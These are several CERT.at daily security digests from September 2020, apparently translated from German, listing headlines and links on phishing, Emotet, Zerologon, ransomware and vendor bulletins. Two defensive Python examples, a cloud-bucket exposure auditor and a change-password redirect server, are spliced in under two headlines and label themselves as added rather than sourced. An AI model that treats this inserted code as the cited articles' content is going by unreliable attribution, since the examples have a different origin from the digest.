https://www.ibm.com/blogs/psirt/security-bulletin-websphere-application-ser…
∗∗∗ Security Bulletin: A vulnerability in IBM Java Runtime affects IBM Spectrum Conductor and IBM Spectrum Conductor with Spark ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-a-vulnerability-in-ibm-ja…
∗∗∗ Security Bulletin: Information disclosure vulnerability affects IBM Business Automation Workflow and IBM Business Process Manager (BPM) – CVE-2020-4531 ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-information-disclosure-vu…
=====================
= End-of-Day report =
=====================
Timeframe: Wednesday 23-09-2020 18:00 − Thursday 24-09-2020 18:00
Handler: Stephan Richter
Co-Handler: n/a
=====================
= News =
=====================
∗∗∗ Security checklist: passwords & accounts ∗∗∗
---------------------------------------------
Passwords are a necessary evil. With the following tips you keep password stress to a minimum without skimping on security.
---------------------------------------------
https://heise.de/-4886755
∗∗∗ Beware of Raiffeisen phishing SMS ∗∗∗
---------------------------------------------
Fraudulent phishing SMS messages in the name of Raiffeisen Bank are currently being sent out en masse. Supposedly, a PushTAN registration needs to be completed. The linked website looks deceptively similar to the real one. Caution: under no circumstances should you enter your online banking details there. They go straight into the hands of criminals.
---------------------------------------------
https://www.watchlist-internet.at/news/vorsicht-vor-raiffeisen-phishing-sms/
∗∗∗ Android malware Alien steals money ∗∗∗
---------------------------------------------
An Android trojan named Alien has been active since the beginning of the year and is offered as Malware-as-a-Service (MaaS) in underground hacker forums. Its targets are banking and finance apps, including in Germany.
---------------------------------------------
https://www.zdnet.de/88382932/android-malware-alien-stiehlt-geld/
∗∗∗ Supply chain offers points of attack ∗∗∗
---------------------------------------------
Hackers are increasingly using the supply chains in companies' ecosystems to carry out their attacks. Smaller suppliers with weak security structures offer entry points for attacks.
---------------------------------------------
https://www.zdnet.de/88382938/supply-chain-bietet-angriffspunkte/
∗∗∗ Protecting Against PowerShell Attacks: 5 Key Steps ∗∗∗
---------------------------------------------
Admins are already busy maintaining all systems running onsite and remotely, so the extra demand to protect against fileless threats can be overwhelming for manual security operations and inexperienced IT professionals. There are, however, five basic steps you can take to help mitigate the threat
---------------------------------------------
https://www.beyondtrust.com/blog/entry/protecting-against-powershell-attack…
∗∗∗ AgeLocker ransomware targets QNAP NAS devices, steals data ∗∗∗
---------------------------------------------
QNAP NAS devices are being targeted in attacks by the AgeLocker ransomware, which encrypts the device's data and, in some cases, steals files from the victim.
---------------------------------------------
https://www.bleepingcomputer.com/news/security/agelocker-ransomware-targets…
∗∗∗ Malicious One-Liner Using Hastebin ∗∗∗
---------------------------------------------
Short scripts that deliver malware to a website are nothing new, but during a recent investigation we found a script using hastebin[.]com, which is a domain we see used infrequently. The script was found writing malicious contents into an image directory on a compromised website, allowing an attacker to execute other malicious commands.
---------------------------------------------
https://blog.sucuri.net/2020/09/malicious-one-liner-using-hastebin.html
∗∗∗ [SANS ISC] Party in Ibiza with PowerShell ∗∗∗
---------------------------------------------
I published the following diary on isc.sans.edu: "Party in Ibiza with PowerShell": Today, I would like to talk about PowerShell ISE or "Integration Scripting Environment". This tool is installed by default on all Windows computers (besides the classic PowerShell interpreter). From a malware analysis point of view, ISE offers a key feature: [...]
---------------------------------------------
https://blog.rootshell.be/2020/09/24/sans-isc-party-in-ibiza-with-powershel…
∗∗∗ Fuzzing Image Parsing in Windows, Part One: Color Profiles ∗∗∗
---------------------------------------------
Image parsing and rendering are basic features of any modern operating system (OS). Image parsing is an easily accessible attack surface, and a vulnerability that may lead to remote code execution or information disclosure in such a feature is valuable to attackers.
---------------------------------------------
https://www.fireeye.com/blog/threat-research/2020/09/fuzzing-image-parsing-…
=====================
= Vulnerabilities =
=====================
∗∗∗ Patch now! Attacks on the Zerologon vulnerability in Windows Server ∗∗∗
---------------------------------------------
Microsoft warns of attacks on a critical security vulnerability in various Windows Server versions. Samba is also affected.
---------------------------------------------
https://heise.de/-4910854
∗∗∗ Security updates for Thursday ∗∗∗
---------------------------------------------
Security updates have been issued by Fedora (firefox, libproxy, mbedtls, samba, and zeromq), openSUSE (chromium and virtualbox), Red Hat (firefox and kernel), SUSE (cifs-utils, conmon, fuse-overlayfs, libcontainers-common, podman, libcdio, python-pip, samba, and wavpack), and Ubuntu (rdflib).
---------------------------------------------
https://lwn.net/Articles/832405/
∗∗∗ Synology-SA-20:22 SRM ∗∗∗
---------------------------------------------
A vulnerability allows remote authenticated users to bypass security constraints via a susceptible version of Synology Router Manager (SRM).
---------------------------------------------
https://www.synology.com/en-global/support/security/Synology_SA_20_22
∗∗∗ Wireshark: Multiple vulnerabilities allow denial of service ∗∗∗
---------------------------------------------
http://www.cert-bund.de/advisoryshort/CB-K20-0922
∗∗∗ Security Bulletin: Multiple vulnerabilities in Apache Struts affect Tivoli Netcool/OMNIbus WebGUI (CVE-2019-0233, CVE-2019-0230) ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-multiple-vulnerabilities-…
∗∗∗ Security Bulletin: Publicly disclosed vulnerability from Kernel affects IBM Netezza Host Management ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-publicly-disclosed-vulner…
∗∗∗ Security Bulletin: Multiple vulnerabilities in IBM Java Runtime affect IBM Spectrum Conductor and IBM Spectrum Conductor with Spark ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-multiple-vulnerabilities-…
∗∗∗ Security Bulletin: Multiple Vulnerabilities Have Been Identified In IBM Security Verify Privilege Manager previously known as IBM Security Privilege Manager ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-multiple-vulnerabilities-…
∗∗∗ Security Bulletin: Publicly disclosed vulnerabilities from Kernel affect IBM Netezza Host Management ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-publicly-disclosed-vulner…
∗∗∗ Security Bulletin: Publicly disclosed vulnerability from Kernel affects IBM Netezza Host Management ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-publicly-disclosed-vulner…
∗∗∗ Security Bulletin: Publicly disclosed vulnerabilities from Kernel affect IBM Netezza Host Management ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-publicly-disclosed-vulner…
∗∗∗ Security Bulletin: Multiple Vulnerabilities Have Been Identified In IBM Security Verify Privilege Vault previously known as IBM Security Secret Server ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-multiple-vulnerabilities-…
∗∗∗ Security Bulletin: Publicly disclosed vulnerability from Kernel affects IBM Netezza Host Management ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-publicly-disclosed-vulner…
∗∗∗ Security Bulletin: Multiple vulnerabilities affect IBM Tivoli Monitoring embedded WebSphere Application and IHS server ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-multiple-vulnerabilities-…
=====================
= End-of-Day report =
=====================
Timeframe: Tuesday 22-09-2020 18:00 − Wednesday 23-09-2020 18:00
Handler: Stephan Richter
Co-Handler: n/a
=====================
= News =
=====================
∗∗∗ Security checklist: web browser ∗∗∗
---------------------------------------------
Your browser very frequently comes into contact with malicious code, even without surfing on shady websites. That makes it all the more important to configure it as securely as possible.
---------------------------------------------
https://heise.de/-4886750
∗∗∗ Watch out: Emotet now hides in password-protected archives ∗∗∗
---------------------------------------------
The operators behind Emotet have launched a new campaign to spread the malware. This time, however, they slipped up on one thing.
---------------------------------------------
https://heise.de/-4909712
∗∗∗ Fraudulent loans from Continental Bank and Eran Finance! ∗∗∗
---------------------------------------------
Due to the effects of the coronavirus crisis, more and more people depend on financial assistance. No wonder that loans and credit are becoming more popular and that cybercriminals are also offering fraudulent loans, for example the loan broker royal-eranfinance.com and the bank continental-groupe.com. The two supposed companies work together. But instead of paying out loans, the companies steal the victims' identity and demand advance payments.
---------------------------------------------
https://www.watchlist-internet.at/news/betruegerische-kredite-von-continent…
∗∗∗ Case Study: Emotet Thread Hijacking, an Email Attack Technique ∗∗∗
---------------------------------------------
Thread hijacking, recently used to distribute Emotet, uses stolen copies of messages collected from infected users' email clients to attack others.
---------------------------------------------
https://unit42.paloaltonetworks.com/emotet-thread-hijacking/
∗∗∗ Linux vulnerabilities: How unpatched servers lead to persistent backdoors ∗∗∗
---------------------------------------------
Vulnerability management is a challenge. Humans make mistakes, software has bugs and some of these bugs are exploitable vulnerabilities. The existence of vulnerabilities in software is not a new problem, but as the volume of software in existence grows, so does the number of exploitable vulnerabilities.
---------------------------------------------
https://resources.infosecinstitute.com/linux-vulnerabilities-how-unpatched-…
∗∗∗ Looking for sophisticated malware in IoT devices ∗∗∗
---------------------------------------------
Let's talk about the structure of the firmware of an IoT device in order to get a better understanding of the different components.
---------------------------------------------
https://securelist.com/looking-for-sophisticated-malware-in-iot-devices/985…
∗∗∗ [SANS ISC] Malicious Word Document with Dynamic Content ∗∗∗
---------------------------------------------
I published the following diary on isc.sans.edu: "Malicious Word Document with Dynamic Content": Here is another malicious Word document that I spotted while hunting. "Another one?" may ask some of our readers. Indeed but malicious documents remain a very common infection vector and you learn a lot when you analyze [...]
---------------------------------------------
https://blog.rootshell.be/2020/09/23/sans-isc-malicious-word-document-with-…
=====================
= Vulnerabilities =
=====================
∗∗∗ Critical Vulnerabilities Patched in XCloner Backup and Restore Plugin ∗∗∗
---------------------------------------------
On August 14, our Threat Intelligence team discovered several vulnerabilities present in XCloner Backup and Restore, a WordPress plugin installed on over 30,000 sites. This flaw gave authenticated attackers, with subscriber-level or above capabilities, the ability to modify arbitrary files, including PHP files. Doing so would allow an attacker to achieve remote code execution on [...]
---------------------------------------------
https://www.wordfence.com/blog/2020/09/critical-vulnerabilities-patched-in-…
∗∗∗ Security updates for Wednesday ∗∗∗
---------------------------------------------
Security updates have been issued by openSUSE (libetpan, libqt4, lilypond, otrs, and perl-DBI), Red Hat (kernel-rt), Slackware (seamonkey), SUSE (grafana, libmspack, openldap2, ovmf, pdns, rubygem-actionpack-5_1, and samba), and Ubuntu (debian-lan-config, ldm, libdbi-perl, and netty-3.9).
---------------------------------------------
https://lwn.net/Articles/832276/
∗∗∗ Samba Issues Patches for Zerologon Vulnerability ∗∗∗
---------------------------------------------
The Samba team has released patches for a critical-severity elevation of privilege vulnerability impacting the Microsoft Windows Netlogon Remote Protocol (MS-NRPC).
---------------------------------------------
https://www.securityweek.com/samba-issues-patches-zerologon-vulnerability
∗∗∗ CVE-2020-1472/Zerologon. As an IT manager should I worry? ∗∗∗
---------------------------------------------
TL;DR Yes, apply the update from Microsoft.
---------------------------------------------
https://www.pentestpartners.com/security-blog/cve-2020-1472-zerologon-as-an…
∗∗∗ Citrix Hypervisor Security Update ∗∗∗
---------------------------------------------
Several security issues have been identified in Citrix Hypervisor (formerly Citrix XenServer) that may allow privileged code in a guest VM to cause the host to crash or become unresponsive. In addition, unprivileged code in a PV guest VM may be able to [...]
---------------------------------------------
https://support.citrix.com/article/CTX282314
∗∗∗ Security Advisory - Buffer Overflow Vulnerability BootHole in GRUB2 Secure Boot ∗∗∗
---------------------------------------------
http://www.huawei.com/en/psirt/security-advisories/2020/huawei-sa-20200923-…
∗∗∗ Security Advisory - Insufficient Input Validation Vulnerability in Some Huawei Phones ∗∗∗
---------------------------------------------
http://www.huawei.com/en/psirt/security-advisories/2020/huawei-sa-20200923-…
∗∗∗ Security Bulletin: Cross-site scripting vulnerability affects IBM Business Automation Workflow and IBM Business Process Manager (BPM) – CVE-2020-4698 ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-cross-site-scripting-vuln…
∗∗∗ Security Bulletin: IBM Maximo Asset Management is vulnerable to path traversal (CVE-2019-4582) ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-ibm-maximo-asset-manageme…
∗∗∗ Security Bulletin: A vulnerability in SQLite affects IBM Cloud Application Performance Management Response Time Monitoring Agent (CVE-2020-15358) ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-a-vulneraqbility-in-sqlit…
∗∗∗ Atlassian Confluence: Vulnerability allows information disclosure ∗∗∗
---------------------------------------------
https://www.cert-bund.de/advisoryshort/CB-K20-0920
∗∗∗ Red Hat Enterprise Linux: Vulnerability allows denial of service ∗∗∗
---------------------------------------------
https://www.cert-bund.de/advisoryshort/CB-K20-0921
--
CERT.at Daily mailing list
Listinfo: https://lists.cert.at/cgi-bin/mailman/listinfo/daily
=====================
= End-of-Day report =
=====================
Timeframe: Montag 21-09-2020 18:00 − Dienstag 22-09-2020 18:00
Handler: Stephan Richter
Co-Handler: n/a
=====================
= News =
=====================
∗∗∗ Google Cloud Buckets Exposed in Rampant Misconfiguration ∗∗∗
---------------------------------------------
A too-large percentage of cloud databases containing highly sensitive information are publicly available, an analysis shows.
---------------------------------------------
https://threatpost.com/google-cloud-buckets-exposed-misconfiguration/159429/
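The misconfiguration the article describes is almost always a bucket IAM policy that grants a role to one of the two public principals. The following is an added example (not code from the Threatpost article) that audits policy documents in the shape returned by `gsutil iam get gs://<bucket>` and the JSON API (a `bindings` list of `role`/`members`); the three sample policies are constructed, and `allAuthenticatedUsers` is treated as public because any Google account qualifies.

```python
"""Flag Google Cloud Storage bucket IAM policies that expose the bucket publicly.

Added example, not from the Threatpost article. Input is the policy document
shape produced by `gsutil iam get` / the Storage JSON API; sample policies
below are constructed for illustration.
"""
from __future__ import annotations

# The two principals that make a binding public. allAuthenticatedUsers means
# "anyone with a Google account", which is public for practical purposes.
PUBLIC_MEMBERS = {"allUsers", "allAuthenticatedUsers"}

# Roles that let a public principal read object contents outright.
READ_ROLES = {
    "roles/storage.objectViewer",
    "roles/storage.legacyObjectReader",
    "roles/storage.legacyBucketReader",
    "roles/storage.objectAdmin",
    "roles/storage.admin",
}


def public_bindings(policy: dict) -> list[tuple[str, str]]:
    """Return (role, member) pairs in `policy` granted to a public principal."""
    found = []
    for binding in policy.get("bindings", []):
        for member in binding.get("members", []):
            if member in PUBLIC_MEMBERS:
                found.append((binding["role"], member))
    return found


def classify(name: str, policy: dict) -> dict:
    """Summarise one bucket: is it public, and can anyone read the objects?"""
    hits = public_bindings(policy)
    return {
        "bucket": name,
        "public": bool(hits),
        "readable_by_anyone": any(role in READ_ROLES for role, _ in hits),
        "bindings": hits,
    }


def audit(policies: dict[str, dict]) -> list[dict]:
    """Return findings for every bucket that has at least one public binding."""
    return [classify(name, p) for name, p in policies.items() if public_bindings(p)]


# Constructed sample policies (etag/version fields omitted).
SAMPLE_POLICIES = {
    "acme-backups": {
        "bindings": [
            {"role": "roles/storage.objectViewer", "members": ["allUsers"]},
            {"role": "roles/storage.admin", "members": ["user:ops@example.com"]},
        ]
    },
    "acme-static-site": {
        "bindings": [
            {"role": "roles/storage.objectViewer",
             "members": ["allAuthenticatedUsers"]},
        ]
    },
    "acme-private": {
        "bindings": [
            {"role": "roles/storage.admin", "members": ["group:data@example.com"]},
        ]
    },
}

if __name__ == "__main__":
    for finding in audit(SAMPLE_POLICIES):
        print(finding)
```

In a real run, feed `audit()` the output of `gsutil iam get` for each bucket in the project; a static website bucket legitimately needs `allUsers` with `objectViewer`, so the point of the `readable_by_anyone` flag is to separate those from buckets that should never have had a public binding.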
∗∗∗ New and improved Security Update Guide! ∗∗∗
---------------------------------------------
We're excited to announce a significant update to the Security Update Guide, our one-stop site for information about all security updates provided by Microsoft. This new version will provide a more intuitive user experience to help protect our customers regardless of what Microsoft products or services they use in their environment.
---------------------------------------------
https://msrc-blog.microsoft.com:443/2020/09/21/new-and-improved-security-up…
∗∗∗ Cyber threats: Free "Adversary Emulation Plans" available for companies ∗∗∗
---------------------------------------------
A new MITRE project provides information intended to guide red teams step by step through re-enacting realistic attack scenarios.
---------------------------------------------
https://heise.de/-4907083
∗∗∗ instructionsweb.com leads into a subscription trap ∗∗∗
---------------------------------------------
Did a search for the user manual of an electronic device take you to instructionsweb.com? Did you quickly and easily find the manual you needed there? The price of 95 cents seems affordable too. Be careful: once you enter your credit card details you fall into a subscription trap that costs you EUR 11.95 a month. And: despite paying, you get no manual at all!
---------------------------------------------
https://www.watchlist-internet.at/news/instructionswebcom-fuehrt-in-abo-fal…
∗∗∗ Does your business have a Well-Known URL for changing passwords? It should! ∗∗∗
---------------------------------------------
If you're a business whose website customers access with a password, spend a few minutes creating your own .well-known/change-password URL that points users to the correct place.
---------------------------------------------
https://businessinsights.bitdefender.com/business-url-changing-password
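What that URL has to do is small: answer `/.well-known/change-password` with a redirect to the real password-change page. The WICG draft behind it adds one more requirement that is easy to miss: a second, deliberately non-existent well-known path must not return 200, so that password managers can tell a genuine implementation from a site that serves a landing page for every URL. The following is an added example (not code from the Bitdefender article or any real site); the password page path `/account/security/password` is hypothetical, and `probe()` performs the check a client would run.

```python
"""Serve /.well-known/change-password and probe a site for it.

Added example, not code from the Bitdefender article. Assumes the site's real
password-change page is /account/security/password (hypothetical). Follows the
WICG "A Well-Known URL for Changing Passwords" draft: redirect from the
well-known path, and never answer the draft's not-exist path with 200.
"""
from __future__ import annotations

from wsgiref.simple_server import make_server

CHANGE_PASSWORD_PAGE = "/account/security/password"  # assumed, site-specific
WELL_KNOWN = "/.well-known/change-password"
# Path from the draft that a compliant site must NOT answer with 200.
NOT_EXIST = ("/.well-known/resource-that-should-not-exist-"
             "whose-status-code-should-not-be-200")


def route(path: str) -> tuple[str, list[tuple[str, str]], bytes]:
    """Return (status, headers, body) for a request path."""
    if path == WELL_KNOWN:
        # 302/303/307 all work; no-store keeps caches from pinning the target.
        return ("302 Found",
                [("Location", CHANGE_PASSWORD_PAGE), ("Cache-Control", "no-store")],
                b"")
    if path == CHANGE_PASSWORD_PAGE:
        return "200 OK", [("Content-Type", "text/html")], b"<form>change password</form>"
    return "404 Not Found", [("Content-Type", "text/plain")], b"not found"


def app(environ, start_response):
    """Minimal WSGI wrapper around route()."""
    status, headers, body = route(environ.get("PATH_INFO", "/"))
    start_response(status, headers)
    return [body]


def probe(router=route) -> dict:
    """Emulate a password manager's check; `router` maps a path to a response."""
    status, headers, _ = router(WELL_KNOWN)
    location = dict(headers).get("Location")
    redirects = status.startswith(("301", "302", "303", "307", "308")) and bool(location)
    missing_status, _, _ = router(NOT_EXIST)
    not_catch_all = not missing_status.startswith("200")
    return {"redirects": redirects, "target": location,
            "not_catch_all": not_catch_all,
            "implemented": redirects and not_catch_all}


def catch_all_router(path: str) -> tuple[str, list[tuple[str, str]], bytes]:
    """Constructed negative case: a site that serves 200 for every URL."""
    return "200 OK", [("Content-Type", "text/html")], b"<h1>welcome</h1>"


if __name__ == "__main__":
    print(probe())            # the self-check; expect implemented=True
    with make_server("127.0.0.1", 8080, app) as httpd:
        print("try: curl -i http://127.0.0.1:8080/.well-known/change-password")
        httpd.serve_forever()
```

The same two requests are what to run with curl against the production site after deploying the redirect: one to the well-known path expecting a 3xx with a Location header, one to the not-exist path expecting anything but 200.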
∗∗∗ Optimizing Away JavaScript Obfuscation. (arXiv:2009.09170v1 [cs.CR]) ∗∗∗
---------------------------------------------
JavaScript is a popular attack vector for releasing malicious payloads on unsuspecting Internet users. Authors of this malicious JavaScript often employ numerous obfuscation techniques in order to prevent the automatic detection by antivirus and hinder manual analysis by professional malware analysts. Consequently, this paper presents SAFE-Deobs, a JavaScript deobfuscation tool that we have built.
---------------------------------------------
https://arxiv.org/abs/2009.09170
∗∗∗ Microsoft secures unprotected backend server of its Bing search engine ∗∗∗
---------------------------------------------
It exposed 6.5 TB of data, consisting exclusively of log files without personal information. Microsoft speaks of a misconfiguration: the server in question had no password set.
---------------------------------------------
https://www.zdnet.de/88382854/microsoft-sichert-ungeschuetzten-backend-serv…
=====================
= Vulnerabilities =
=====================
∗∗∗ Firefox: New desktop versions close potential entry points for attackers ∗∗∗
---------------------------------------------
With versions 81 and ESR 78.3 of the Firefox web browser, the Mozilla team also ships fixes for several vulnerabilities.
---------------------------------------------
https://heise.de/-4909119
∗∗∗ Security updates for Tuesday ∗∗∗
---------------------------------------------
Security updates have been issued by Mageia (mysql-connector-java), openSUSE (chromium, curl, libqt4, and singularity), Red Hat (bash and kernel), SUSE (python-pip and python3), and Ubuntu (busybox, ceph, freeimage, libofx, libpam-tacplus, linux, linux-aws, linux-aws-hwe, linux-azure, linux-azure-4.15, linux-gcp, linux-gcp-4.15, linux-gke-4.15, linux-hwe, linux-oem, linux-oracle, linux-raspi2, linux-snapdragon, linux, linux-azure, linux-gcp, linux-oracle, novnc, and tnef).
---------------------------------------------
https://lwn.net/Articles/832164/
∗∗∗ VMware Horizon DaaS: Vulnerability allows bypassing security controls ∗∗∗
---------------------------------------------
A remote, authenticated attacker can exploit a vulnerability in VMware Horizon DaaS to bypass security controls.
---------------------------------------------
https://www.cert-bund.de/advisoryshort/CB-K20-0916
∗∗∗ Xen Security Advisories ∗∗∗
---------------------------------------------
The Xen Project has released 10 Security Advisories on 2020-09-22.
---------------------------------------------
https://xenbits.xen.org/xsa/
∗∗∗ Security Bulletin: CVE-2020-2590 (deferred from Oracle Jan 2020 CPU) ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-cve-2020-2590-deferred-fr…
∗∗∗ Security Bulletin: CVE-2020-2601 (deferred from Oracle Jan 2020 CPU) ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-cve-2020-2601-deferred-fr…
∗∗∗ Security Bulletin: IBM Data Risk Manager is affected by multiple vulnerabilities ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-ibm-data-risk-manager-is-…
∗∗∗ Security Bulletin: IBM SDK, Java Technology Edition Quarterly CPU – Jul 2020 – Includes Oracle Jul 2020 CPU plus one additional vulnerability ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-ibm-sdk-java-technology-e…
∗∗∗ Security Bulletin: Multiple vulnerabilities in IBM Java SDK affect IBM Cloud Manager with OpenStack ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-multiple-vulnerabilities-…
∗∗∗ Security Bulletin: Apache ZooKeeper as used by IBM QRadar SIEM is vulnerable to information disclosure (CVE-2019-0201) ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-apache-zookeeper-as-used-…
∗∗∗ Security Bulletin: Vulnerabilities in Node.js affect IBM App Connect Enterprise V11 ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-vulnerabilities-in-node-j…
=====================
= End-of-Day report =
=====================
Timeframe: Freitag 18-09-2020 18:00 − Montag 21-09-2020 18:00
Handler: Stephan Richter
Co-Handler: n/a
=====================
= News =
=====================
∗∗∗ Google App Engine: Redirect feature facilitates phishing and malware distribution ∗∗∗
---------------------------------------------
Google's cloud application platform App Engine gives criminals plenty of leeway when generating malicious links, and they are making full use of it in active attacks.
---------------------------------------------
https://heise.de/-4906593
∗∗∗ iOS 14: Private Wi-Fi addresses can cause problems ∗∗∗
---------------------------------------------
iOS 14 automatically switches iPhones to random MAC addresses. In home and corporate networks this can lead to connection problems.
---------------------------------------------
https://heise.de/-4907542
∗∗∗ uMatrix no longer developed: repository set to "archived" ∗∗∗
---------------------------------------------
The browser extension uMatrix has been marked as archived on GitHub. This ends further development of the firewall extension.
---------------------------------------------
https://heise.de/-4906711
∗∗∗ Windows 10 Health Report: September 2020 issues, Defender fiasco, & more ∗∗∗
---------------------------------------------
This Windows 10 Health Report provides an overview of the problems people are encountering in September 2020 due to new cumulative updates or changes made in the operating system.
---------------------------------------------
https://www.bleepingcomputer.com/news/microsoft/windows-10-health-report-se…
∗∗∗ Slightly broken overlay phishing, (Mon, Sep 21st) ∗∗∗
---------------------------------------------
At the Internet Storm Center, we often receive examples of interesting phishing e-mails from our readers. Of course, this is not the only source of interesting malicious messages in our inboxes - sometimes the phishing authors "cut out the middleman" and send their creations directly to us. Last week, this was the case with a slightly unusual (and slightly broken) phishing, which tries to use legitimate pages overlaid with a fake login prompt.
---------------------------------------------
https://isc.sans.edu/diary/rss/26586
∗∗∗ The Hidden PHP Malware that Reinfects Cleaned Files ∗∗∗
---------------------------------------------
Website reinfections are a serious problem for website owners, and it can often be difficult to determine the cause behind the reinfection, especially if you lack access to the necessary logs, which is usually the case for shared hosting services. Some of the more common causes of reinfections are issues like cross-site contamination or unpatched website software security vulnerabilities that get re-exploited.
---------------------------------------------
https://blog.sucuri.net/2020/09/the-hidden-php-malware-that-reinfects-clean…
∗∗∗ One Part Steganography, Four Redirectors, and a Splash of C2! ∗∗∗
---------------------------------------------
What do you get when you combine Google Images, QR Codes, and Remote Command Execution? This silly project of mine I'd like to share with you all, of course! Building off of my security research from my last couple of blogs, I decided to use my research using dynamic web content to proxy traffic over third party image providers, and try to find a valid bi-directional method for sending data between a NAT'd client and a public server.
---------------------------------------------
https://medium.com/@curtbraz/one-part-steganography-four-redirectors-and-a-…
∗∗∗ Is domain name abuse something companies should worry about? ∗∗∗
---------------------------------------------
Should you worry about domain name abuse? For the most part it depends on what kind of company you are and what you expect to encounter.
---------------------------------------------
https://blog.malwarebytes.com/business-2/2020/09/is-domain-name-abuse-somet…
∗∗∗ The Return of Raining SYSTEM Shells with Citrix Workspace app ∗∗∗
---------------------------------------------
TL;DR Back in July I documented a new Citrix Workspace vulnerability that allowed attackers to remotely execute arbitrary commands under the SYSTEM account. Well after some further investigation on the [...]
---------------------------------------------
https://www.pentestpartners.com/security-blog/the-return-of-raining-system-…
∗∗∗ Code execution, defense evasion are top tactics used in critical attacks against corporate endpoints ∗∗∗
---------------------------------------------
Cisco examines MITRE ATT&CK data to suggest the threat vectors enterprise security staff should focus their efforts on.
---------------------------------------------
https://www.zdnet.com/article/defense-evasion-code-execution-are-the-top-at…
∗∗∗ Review of the second third of 2020 ∗∗∗
---------------------------------------------
Unlike the first third of the year, the second began considerably less dramatically as far as IT security is concerned. Apart from Citrix, to which we owed our first ad-hoc advisory in the second third of the year as well, another old vulnerability rose to new "fame".
---------------------------------------------
https://cert.at/de/blog/2020/9/ruckblick-auf-das-zweite-drittel-2020
=====================
= Vulnerabilities =
=====================
∗∗∗ Security flaw: Mobile Firefox browser executed commands from the Wi-Fi network ∗∗∗
---------------------------------------------
Attackers on the same Wi-Fi network could make the mobile Firefox browser on Android open arbitrary web pages or other apps, without any user interaction.
---------------------------------------------
https://www.golem.de/news/sicherheitsluecke-mobiler-firefox-browser-fuehrte…
∗∗∗ Micropatch for Zerologon, the "perfect" Windows vulnerability (CVE-2020-1472) ∗∗∗
---------------------------------------------
The Zerologon vulnerability allows an attacker with network access to a Windows Domain Controller to quickly and reliably take complete control of the Windows domain. As such, it is a perfect vulnerability for any attacker and a nightmare for defenders.
---------------------------------------------
https://blog.0patch.com/2020/09/micropatch-for-zerologon-perfect.html
∗∗∗ Security updates for Monday ∗∗∗
---------------------------------------------
Security updates have been issued by Debian (inspircd and modsecurity), Fedora (chromium, cryptsetup, gnutls, mingw-libxml2, and seamonkey), openSUSE (ark, chromium, claws-mail, docker-distribution, fossil, hylafax+, inn, knot, libetpan, libjpeg-turbo, libqt4, librepo, libvirt, libxml2, lilypond, mumble, openldap2, otrs, pdns-recursor, perl-DBI, python-Flask-Cors, singularity, slurm_18_08, and virtualbox), SUSE (jasper, less, ovmf, and rubygem-actionview-4_2), and Ubuntu (sa-exim).
---------------------------------------------
https://lwn.net/Articles/832080/
∗∗∗ MISP 2.4.132 released (security fix CVE-2020-25766 and bugs fixed) ∗∗∗
---------------------------------------------
A new version of MISP (2.4.132) has been released with several bugs fixed including an important security fix CVE-2020-25766.
---------------------------------------------
https://www.misp-project.org/2020/09/21/MISP.2.4.132.released.html
∗∗∗ B-swiss 3 Digital Signage System 3.6.5 Backdoor Remote Code Execution ∗∗∗
---------------------------------------------
https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5590.php
∗∗∗ B-swiss 3 Digital Signage System 3.6.5 CSRF Add Maintenance Admin ∗∗∗
---------------------------------------------
https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5589.php
∗∗∗ B-swiss 3 Digital Signage System 3.6.5 Database Disclosure ∗∗∗
---------------------------------------------
https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5588.php
∗∗∗ Security Bulletin: Denial of Service with HTTP/2 in IBM DataPower Gateway (CVE-2020-4579) ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-denial-of-service-with-ht…
∗∗∗ Security Bulletin: IBM Business Automation Content Analyzer is affected by Insecure Cookie vulnerability ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-ibm-business-automation-c…
∗∗∗ Security Bulletin: Denial of Service with HTTP/2 in IBM DataPower Gateway (CVE-2020-4581) ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-denial-of-service-with-ht…
∗∗∗ Security Bulletin: Denial of Service in IBM DataPower Gateway (CVE-2020-4580) ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-denial-of-service-in-ibm-…
∗∗∗ Security Bulletin: Vulnerability in bind (CVE-2020-8616 and CVE-2020-8617). ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-vulnerability-in-bind-cve…
∗∗∗ Security Bulletin: Vulnerability in ntp (CVE-2020-11868 and CVE-2020-13817). ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-vulnerability-in-ntp-cve-…
=====================
= End-of-Day report =
=====================
Timeframe: Donnerstag 17-09-2020 18:00 − Freitag 18-09-2020 18:00
Handler: Thomas Pribitzer
Co-Handler: n/a
=====================
= News =
=====================
∗∗∗ Maze ransomware now encrypts via virtual machines to evade detection ∗∗∗
